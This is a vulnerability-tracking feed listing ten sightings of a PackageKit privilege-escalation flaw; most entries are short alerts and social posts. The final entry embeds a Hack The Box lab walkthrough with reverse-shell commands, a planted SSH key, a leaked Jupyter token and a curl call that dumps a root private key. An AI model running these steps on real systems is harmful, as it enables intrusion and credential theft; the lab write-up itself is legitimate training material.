https://vulnerability.circl.lu/sightings/feed 2026-06-21T05:52:07.931989+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent sightings. https://vulnerability.circl.lu/sighting/2da47309-262a-472b-bc39-f354b7ba0116/export 2026-06-21T05:52:07.968436+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "2da47309-262a-472b-bc39-f354b7ba0116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://t.me/GithubRedTeam/82559", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-41651\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a aexdyhaxor\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 02:57:46\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPrivilege Escalation Vulnerability in PackageKit (TOCTOU Race Condition)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T03:00:04.000000Z"} 2026-05-03T03:00:04+00:00 https://vulnerability.circl.lu/sighting/c9198c67-29a3-4f3f-8e48-ae8be6c378d1/export 2026-06-21T05:52:07.968342+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "c9198c67-29a3-4f3f-8e48-ae8be6c378d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "Telegram/jeht1hlPckgqiNrYmKXPjtYBl6Ckbf5A93GyXLRwxjRq970", "content": "", "creation_timestamp": "2026-05-03T09:00:04.000000Z"} 2026-05-03T09:00:04+00:00 https://vulnerability.circl.lu/sighting/c01217e9-fcf0-4986-90b0-fac53e5cf4c7/export 2026-06-21T05:52:07.968247+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "c01217e9-fcf0-4986-90b0-fac53e5cf4c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/blogulluciprian.bsky.social/post/3mm5fwvyo522z", "content": "Alert\u0103 de securitate Linux: cum s\u0103 v\u0103 proteja\u021bi de vulnerabilitatea Pack2TheRoot\n\nO vulnerabilitate critic\u0103 cu un istoric de aproape 12 ani, numit\u0103 sugestiv Pack2TheRoot \u0219i \u00eenregistrat\u0103 oficial ca CVE-2026-41651, a zguduit recent lumea securit\u0103\u021bii...\n\nciprianbugulet.blogspot.com/2026/05/aler...", "creation_timestamp": "2026-05-18T17:34:38.621668Z"} 2026-05-18T17:34:38.621668+00:00 https://vulnerability.circl.lu/sighting/23536d04-da06-4d37-9667-eb54f4788e7c/export 2026-06-21T05:52:07.968150+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "23536d04-da06-4d37-9667-eb54f4788e7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5kizznyk2c", "content": "A critical race condition in PackageKit (CVE-2026-41651) opens #openSUSE and #SUSE systems to local privilege escalation. Read more -> tinyurl.com/3tjvx4ax #Security", "creation_timestamp": "2026-05-18T18:56:27.359377Z"} 2026-05-18T18:56:27.359377+00:00 https://vulnerability.circl.lu/sighting/c5f759f0-1951-41a3-ba13-d723eddc806d/export 2026-06-21T05:52:07.968053+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "c5f759f0-1951-41a3-ba13-d723eddc806d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5kj4ndq22c", "content": "A critical race condition in PackageKit (CVE-2026-41651) opens #openSUSE and #SUSE systems to local privilege escalation. Read more -> tinyurl.com/3tjvx4ax #Security", "creation_timestamp": "2026-05-18T18:56:30.208826Z"} 2026-05-18T18:56:30.208826+00:00 https://vulnerability.circl.lu/sighting/0c6c140b-54db-4516-8df3-221eebb79466/export 2026-06-21T05:52:07.967949+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "0c6c140b-54db-4516-8df3-221eebb79466", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3mm5kj7mbss2c", "content": "A critical race condition in PackageKit (CVE-2026-41651) opens #openSUSE and #SUSE systems to local privilege escalation. Read more -> tinyurl.com/3tjvx4ax #Security", "creation_timestamp": "2026-05-18T18:56:30.761174Z"} 2026-05-18T18:56:30.761174+00:00 https://vulnerability.circl.lu/sighting/f5cfee9f-e147-46d9-bf0a-0ef4f11078c7/export 2026-06-21T05:52:07.967840+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "f5cfee9f-e147-46d9-bf0a-0ef4f11078c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://t.me/GithubRedTeam/84938", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-41651\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Lutfifakee-Project\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C\n\u2b50 Star\u6570\u91cf\uff1a 0 | \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-20 07:48:18\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nExploit for CVE-2026-41651 - PackageKit TOCTOU Local Privilege Escalation (Pack2TheRoot)\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-20T08:00:04.000000Z"} 2026-05-20T08:00:04+00:00 https://vulnerability.circl.lu/sighting/d7218c93-9250-439f-b7f8-68f76c0c8b9a/export 2026-06-21T05:52:07.967732+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "d7218c93-9250-439f-b7f8-68f76c0c8b9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "published-proof-of-concept", "source": "Telegram/LRuVHO_NRtLslMv_pxl3JYoJM5ygIHd_ktikilExPtpHxGM", "content": "", "creation_timestamp": "2026-05-20T15:00:07.000000Z"} 2026-05-20T15:00:07+00:00 https://vulnerability.circl.lu/sighting/f2bc4b4d-fdae-42bd-b2a4-87d30eb1f966/export 2026-06-21T05:52:07.967598+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "f2bc4b4d-fdae-42bd-b2a4-87d30eb1f966", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://bsky.app/profile/te9-dev.bsky.social/post/3mn2bx25fmb2g", "content": "CVE-2026-41651 | 52 stars | 15 forks\n\nTrending on te9.dev", "creation_timestamp": "2026-05-30T05:10:16.950677Z"} 2026-05-30T05:10:16.950677+00:00 https://vulnerability.circl.lu/sighting/081b6f10-e267-4987-bdce-5bb2d5df0ee7/export 2026-06-21T05:52:07.965653+00:00 Automation user https://vulnerability.circl.lu/user/automation {"uuid": "081b6f10-e267-4987-bdce-5bb2d5df0ee7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-41651", "type": "seen", "source": "https://gist.github.com/Yann-P/597c2a31f6485fd849eb896411334a3f", "content": "\n1. nmap\n2. find port 80\n3. http page mentions mcp port 6274\n4. try access port 6274 in http\n5. shows mcpjam landing page\n6. find CVE and exploit https://raw.githubusercontent.com/alisster00/CVE-2026-23744-RCE/refs/heads/main/script.py\n7. reverse shell, `nc -l 10.10.15.61 4444`, `python mcpexploit.py --lport 4444 --lhost 10.10.15.61 -p 6274 devhub.htb`\n8. put autorized key, `echo 'ssh-ed25519 AAAAC3NzaC1l... htb' > ~/.ssh/authorized_keys`\n\n### Track 1: linpeas\n\n1. on host, `curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh > linpeas.sh`\n2. on host, `scp -i ~/.ssh/htb ./linpeas.sh mcp-dev@devhub.htb:~/`\n3. on target, run linpeas\n\nFindings\n\n```\nhttps://github.security.telekom.com/2026/04/pack2theroot-linux-local-privilege-escalation.html\nPackageKit version detected: 1.2.5\nVulnerable to CVE-2026-41651 (Pack2TheRoot) - PackageKit 1.2.5 is in the vulnerable range >=1.0.2 <=1.3.4\n```\n\nNot exploited for now.\n\n### Track 2: lateral movement to analyst\n\n10. ls /home, shows user \"analyst\"\n11. `ps aux | grep analyst`\n\n```\nanalyst 1077 0.0 2.4 182524 96256 ? Ss 09:53 0:06 /home/analyst/jupyter-env/bin/python3 /home/analyst/jupyter-env/bin/jupyter-lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token=a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7 --ServerApp.password= --ServerApp.allow_origin= --ServerApp.disable_check_xsrf=False\nroot 1082 0.0 0.7 37376 28788 ? Ss 09:53 0:01 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n### Track 3: Jupyter\n\n1. Expose port 8888\n2. `ssh -i ~/.ssh/htb mcp-dev@devhub.htb -L 8888:localhost:8888 `\n3. token is leaked by ps aux above, set up new password \"yolo\" on localhost:8888 web ui.\n4. new terminal on jupyterlab (shell as analyst) -> `cat user.txt` -> `e73a08ded246c24...`\n\nLateral to analyst succeeded. User flag solved.\n\nAdditional: \n1. `mkdir ~/.ssh && echo 'ssh-ed25519 AAAAC3NzaC1lZDI1NT.... htb' > ~/.ssh/authorized_keys`\n\n### Track 4: linpeas again\n\n1. `scp -i ~/.ssh/htb ./linpeas.sh analyst@devhub.htb:~/`\n\nFindings\n\n```\n\u2550\u2563 Services with writable paths? . jupyter.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\njupyter.service: /home/analyst/jupyter-env/bin/jupyter (from ExecStart=/home/analyst/jupyter-env/bin/jupyter lab --ip=127.0.0.1 --port=8888 --no-browser --notebook-dir=/home/analyst/notebooks --ServerApp.token='a7f3b2c9d8e1f4a5b6c7d8e9f0a1b2c3d4e5f6a7' --ServerApp.password='' --ServerApp.allow_origin='' --ServerApp.disable_check_xsrf=False)\nopsmcp.service: Writable service PATH entry '/home/analyst/jupyter-env/bin'\n```\n\n\n### Exploration\n- processes ran as root\n\n```\nroot 1082 0.0 0.7 37376 28788 ? Ss 09:53 0:02 /home/analyst/jupyter-env/bin/python3 /opt/opsmcp/server.py\n```\n\n- env: nothing.\n\n## Track 5: /opt/opsmcp/server.py runs as root\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nOPSMCP - Operations MCP Server\nInternal tool for system operations management\n\"\"\"\n\nfrom flask import Flask, jsonify, request\nimport os\n\napp = Flask(__name__)\n\n# API Key for authentication\nVALID_API_KEY = \"opsmcp_secret_key_4f5a6b7c8d9e0f1a\"\n\n...\n\ndef check_auth():\n \"\"\"Check API key authentication\"\"\"\n api_key = request.headers.get('X-API-Key', '')\n return api_key == VALID_API_KEY\n\n...\n\n@app.route('/tools/call', methods=['POST'])\ndef call_tool():\n if not check_auth():\n return jsonify({\"error\": \"Unauthorized\", \"message\": \"Valid X-API-Key header required\"}), 401\n\n data = request.get_json() or {}\n tool_name = data.get('name', '')\n args = data.get('arguments', {})\n\n if not tool_name:\n return jsonify({\"error\": \"Tool name required\"}), 400\n\n if tool_name not in ALL_TOOLS:\n return jsonify({\"error\": f\"Unknown tool: {tool_name}\"}), 404\n\n # Execute tool\n if tool_name == \"ops.system_status\":\n ...\n\n\n elif tool_name == \"ops._admin_dump\":\n target = args.get('target', '')\n confirm = args.get('confirm', False)\n\n if not confirm:\n return jsonify({\n \"error\": \"Confirmation required\",\n \"usage\": \"Set confirm=true to proceed\",\n \"warning\": \"This dumps sensitive credentials\"\n })\n\n if target == \"ssh_keys\":\n try:\n with open('/root/.ssh/id_rsa', 'r') as f:\n key_data = f.read()\n return jsonify({\n \"target\": \"ssh_keys\",\n \"root_private_key\": key_data,\n \"note\": \"Emergency recovery key dump\"\n })\n except Exception as e:\n return jsonify({\n \"target\": \"ssh_keys\",\n \"error\": f\"Could not read key: {str(e)}\"\n })\n\n ...\n\nif __name__ == '__main__':\n app.run(host='127.0.0.1', port=5000, debug=False)\n```\n\n\n1. There are tokens in cleartext\n2. In track 6 we have already seen that flask is owned by root: connection to this finding?\n3. Script analysis\n\t1. we probably have the passwords of analyst but not needed anymore\n\t2. This can leak /root/.ssh/id_rsa !\n4. we want to expose this, call with `tool_name=ops._admin_dump` and `target == \"ssh_keys\":`\n\t1. expose `ssh -i ~/.ssh/htb analyst@devhub.htb -L 5000:localhost:5000`\n\t2. try\n\t\n```\n\tcurl localhost:5000\n{\"auth\":\"Required - X-API-Key header\",\"endpoints\":[\"/tools/list\",\"/tools/call\",\"/health\"],\"server\":\"OPSMCP\",\"status\":\"operational\",\"version\":\"2.1.0\"}\n```\n\n```\n curl -s -X POST \\\n 'http://localhost:5000/tools/call' \\\n -H 'X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a' \\\n -H \"Content-Type: application/json\" -d '{\"name\": \"ops._admin_dump\", \"arguments\": {\"confirm\": true, \"target\": \"ssh_keys\"}}'\n```\n\nreturns the root ssh key.\n\n1. vim ~/.ssh/htb2\n2. chmod 600 ~/.ssh/htb2\n3. ssh -i ~/.ssh/htb2 root@devhub.htb\n4. cat root.txt\n\nSolved\n\n## Track 6 : writable /home/analyst/jupyter-env/bin found by linpeas\n\n1. \n\n```\n analyst@devhub:~$ ls -Rl /home/analyst/jupyter-env/bin\n/home/analyst/jupyter-env/bin:\n-rw-r--r-- 1 analyst analyst 2008 Jan 22 15:03 activate\n-rw-r--r-- 1 analyst analyst 934 Jan 22 15:03 activate.csh\n-rw-r--r-- 1 analyst analyst 2210 Jan 22 15:03 activate.fish\n-rw-r--r-- 1 analyst analyst 9033 Jan 22 15:03 Activate.ps1\n-rwxr-xr-x 1 analyst analyst 211 Jan 22 15:06 debugpy\n-rwxr-xr-x 1 analyst analyst 217 Jan 22 15:06 debugpy-adapter\n-rwxr-xr-x 1 analyst analyst 210 Jan 22 15:06 f2py\n-rwxr-xr-x 1 root root 202 Mar 16 21:28 flask\n-rwxr-xr-x 1 analyst analyst 211 Jan 22 15:06 fonttools\n```\n\nflask is owned by root\n\nTrack abandoned\n\n", "creation_timestamp": "2026-06-18T12:30:28.000000Z"} 2026-06-18T12:30:28+00:00